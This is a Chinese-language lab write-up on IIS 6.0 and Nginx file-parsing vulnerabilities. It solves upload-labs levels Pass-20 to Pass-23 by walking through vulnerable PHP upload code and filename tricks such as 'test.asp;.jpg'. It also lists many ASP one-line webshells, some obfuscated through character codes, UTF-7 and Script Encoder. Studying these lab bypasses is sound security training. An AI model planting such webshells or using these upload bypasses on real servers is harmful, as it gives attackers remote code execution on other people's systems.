IIS6.0解析漏洞
IIS6.0解析漏洞,其实有一些不如说是IIS6.0的一些特性,严格意义上而言,只是一些默认配置并不是漏洞 但是也有一些的确是漏洞
IIS6.0解析漏洞(一):
IIS6.0除了将ASP后缀当做ASP进行解析的同时,当文件后缀名字为.asa .cer .cdx 也会当做asp去解析,这是因为IIS6.0在应用程序扩展中默认设置了.asa .cer .cdx 都会调用 asp.dll
IIS6.0解析漏洞(二):
IIS5.1和IIS7.5无此漏洞。 IIS 6.0在处理含有特殊符号的文件路径时会出现逻辑错误,从而造成文件解析漏洞。这一漏洞有两种完全不同的利用方式: ? ?? ?
test.asp;.jpg ? 他将当做asp进行解析 ?? ?
test.asp/123.jpg 他将当做asp进行解析
请求 /aaa.asp;xxxx.jpg
N1:从头部查找查找 "."号,获得 .asp;xxxx.jpg
N2:查找";"号,如果有则内存截断
N3:查找"/",如果有则内存截断
最终,将保留下来 .asp 字符串,从META_SCRIPT_MAP脚本映射表里与扩展名匹配对比,并反馈给了asp.dll处理
进入靶场,快点来吧!!!!
upload-labs
http://zmie8016.ia.aqlab.cn/Pass-20/index.php?action=show_code
看源码:
$allowedExts = array("gif", "jpeg", "jpg", "png","asa","cer","cdx");
$temp = explode(".", $_FILES["file"]["name"]);
echo $_FILES["file"]["size"];
$extension = end($temp); // 获取文件后缀名
if ((($_FILES["file"]["type"] == "image/gif")
|| ($_FILES["file"]["type"] == "image/jpeg")
|| ($_FILES["file"]["type"] == "image/jpg")
|| ($_FILES["file"]["type"] == "image/pjpeg")
|| ($_FILES["file"]["type"] == "image/x-png")
|| ($_FILES["file"]["type"] == "image/png"))
&& ($_FILES["file"]["size"] < 204800) // 小于 200 kb
&& in_array($extension, $allowedExts))
{
if ($_FILES["file"]["error"] > 0)
{
echo "错误:: " . $_FILES["file"]["error"] . "";
}
else
{
echo "上传文件名: " . $_FILES["file"]["name"] . "";
echo "文件类型: " . $_FILES["file"]["type"] . "";
echo "文件大小: " . ($_FILES["file"]["size"] / 1024) . " kB";
if (file_exists("./a/image/" . $_FILES["file"]["name"]))
{
echo $_FILES["file"]["name"] . " 文件已经存在。 ";
}
else
{
// 如果 upload 目录不存在该文件则将文件上传到 upload 目录下
$ret = move_uploaded_file($_FILES["file"]["tmp_name"], "image/" . $_FILES["file"]["name"]);
echo "文件存储在: " . "./a/image/" . $_FILES["file"]["name"];
}
}
}
else
{
echo "非法的文件格式";
}
?IIS6.0除了将ASP后缀当做ASP进行解析的同时,当文件后缀名字为.asa、.cer、.cdx也会当做asp去解析
这是因为IIS6.0在应用程序扩展中默认设置了.asa、.cer、.cdx都会调用asp.dll
asp一句话木马
<%eval request("chopper")%>
<%execute request("chopper")%>
<%execute(request("chopper"))%>
<%ExecuteGlobal request("chopper")%>
<%Eval(Request(chr(35)))%>
<%dy=request("c")%><%Eval(dy)%>?
<%if request ("c")<>""then session("c")=request("c"):end if:if session("c")<>"" then execute session("c")%>?
<%?if Request("c")<>"" then ExecuteGlobal request("c") end if?%>
<%execute request("c")%><%'<% loop <%:%>
< %'<% loop <%:%><%execute request("a")%>
<script language=vbs runat=server>eval(request("c"))</script>?
<script language=VBScript runat=server>execute request("#")</script>?
<%eval(eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("c"))%>
<%eval""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&"-"&"2"&"-"&"5"&")"&")")%>
<%execute(unescape("eval%20request%28%22aaa%22%29"))%>
UTF-7编码加密:
<%@ codepage=65000%><% response.Charset=”936″%><%e+j-x+j-e+j-c+j-u+j-t+j-e+j-(+j-r+j-e+j-q+j-u+j-e+j-s+j-t+j-(+j-+ACI-#+ACI)+j-)+j-%>
Script Encoder 加密 ?//密码c
<%@ LANGUAGE = VBScript.Encode %>
<%#@~^PgAAAA==~b0~"+$E+kYvEmr#@!@*rJ~O4+x,36mEDn!VK4mV~Dn5!+dYvEmr#~n NPrW,SBMAAA==^#~@%>
但我用的是<%eval request("a")%>
?
?
?
?
?
?zKaQ-HatBI01Th
upload-labshttp://zmie8016.ia.aqlab.cn/Pass-21/index.php
$allowedExts = array("gif", "jpeg", "jpg", "png");
$temp = explode(".", $_FILES["file"]["name"]);
echo $_FILES["file"]["size"];
$extension = end($temp); // 获取文件后缀名
if ((($_FILES["file"]["type"] == "image/gif")
|| ($_FILES["file"]["type"] == "image/jpeg")
|| ($_FILES["file"]["type"] == "image/jpg")
|| ($_FILES["file"]["type"] == "image/pjpeg")
|| ($_FILES["file"]["type"] == "image/x-png")
|| ($_FILES["file"]["type"] == "image/png"))
&& ($_FILES["file"]["size"] < 204800) // 小于 200 kb
&& in_array($extension, $allowedExts))
{
if ($_FILES["file"]["error"] > 0)
{
echo "错误:: " . $_FILES["file"]["error"] . "";
}
else
{
echo "上传文件名: " . $_FILES["file"]["name"] . "";
echo "文件类型: " . $_FILES["file"]["type"] . "";
echo "文件大小: " . ($_FILES["file"]["size"] / 1024) . " kB";
if (file_exists("./b/image/" . $_FILES["file"]["name"]))
{
echo $_FILES["file"]["name"] . " 文件已经存在。 ";
}
else
{
// 如果 upload 目录不存在该文件则将文件上传到 upload 目录下
$ret = move_uploaded_file($_FILES["file"]["tmp_name"], "image/" . $_FILES["file"]["name"]);
echo "文件存储在: " . "./b/image/" . $_FILES["file"]["name"];
echo "";
}
}
}
else
{
echo "非法的文件格式";IIS 6.0在处理含有特殊符号的文件路径时会出现逻辑错误,从而造成文件解析漏洞
这一漏洞有两种完全不同的利用方式:
(1)3.asp;.jpg 他将当做asp进行解析
(2)test.asp/3.jpg 他将当做asp进行解析?
?
?
?
?
?
?
?zKaQ-Y34Y2ets
upload-labshttp://zmie8016.ia.aqlab.cn/Pass-22/index.php
$allowedExts = array("jpg"); $time = time(); $temp = explode(".", $_FILES["file"]["name"]); echo $_FILES["file"]["size"]; $extension = end($temp); // 获取文件后缀名 if ((($_FILES["file"]["type"] == "image/gif") || ($_FILES["file"]["type"] == "image/jpeg") || ($_FILES["file"]["type"] == "image/jpg") || ($_FILES["file"]["type"] == "image/pjpeg") || ($_FILES["file"]["type"] == "image/x-png") || ($_FILES["file"]["type"] == "image/png")) && ($_FILES["file"]["size"] < 204800) // 小于 200 kb && in_array($extension, $allowedExts)) { if ($_FILES["file"]["error"] > 0) { echo "错误:: " . $_FILES["file"]["error"] . ""; } else { echo "上传文件名: " . $_FILES["file"]["name"] . ""; echo "文件类型: " . $_FILES["file"]["type"] . ""; echo "文件大小: " . ($_FILES["file"]["size"] / 1024) . " kB"; if (file_exists("C:/Inetpub/wwwroot/c/image/a.asp/" .$time.".jpg")) { echo $_FILES["file"]["name"] . " 文件已经存在。 "; } else { // 如果 upload 目录不存在该文件则将文件上传到 upload 目录下 $ret = move_uploaded_file($_FILES["file"]["tmp_name"], "image/a.asp/".$time.".jpg"); echo "文件存储在: " . "./c/image/a.asp/".$time.".jpg"; echo ""; } } } else { echo "非法的文件格式"; }
?只能上传jpg,那就先上传个带码的jpg
上传成功,但可以看到
?
?
?
?
zKaQ-Y1EHhm0O
upload-labshttp://zmie8016.ia.aqlab.cn/Pass-23/index.php
if (isset($_POST['submit'])) {
if (file_exists($UPLOAD_ADDR)) {
$allow_ext = array(".jpg",".jpeg",".png",".bmp",".gif");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //转换为小写
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //收尾去空
if (in_array($file_ext, $deny_ext)) {
if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR . '/' . $_FILES['upload_file']['name'])) {
$img_path = $UPLOAD_ADDR . $_FILES['upload_file']['name'];
$is_upload = true;
}
} else {
$msg = '此文件不允许上传,仅允许[.jpg, .jpeg, .png, .bmp, .gif]!';
}
} else {
$msg = $UPLOAD_ADDR . '文件夹不存在,请手工创建!';
}
}
?php特有的CGI解析漏洞 Nginx默认以CGI的方式支持php解析的,普遍的做法是在Nginx配置文件中通过正则匹配设SCRIPT_FILENAME(绝对路径)
上传的是.jpg
查看的是.jpg/.php
?
?
?
?
总算结束,下次更难~~~?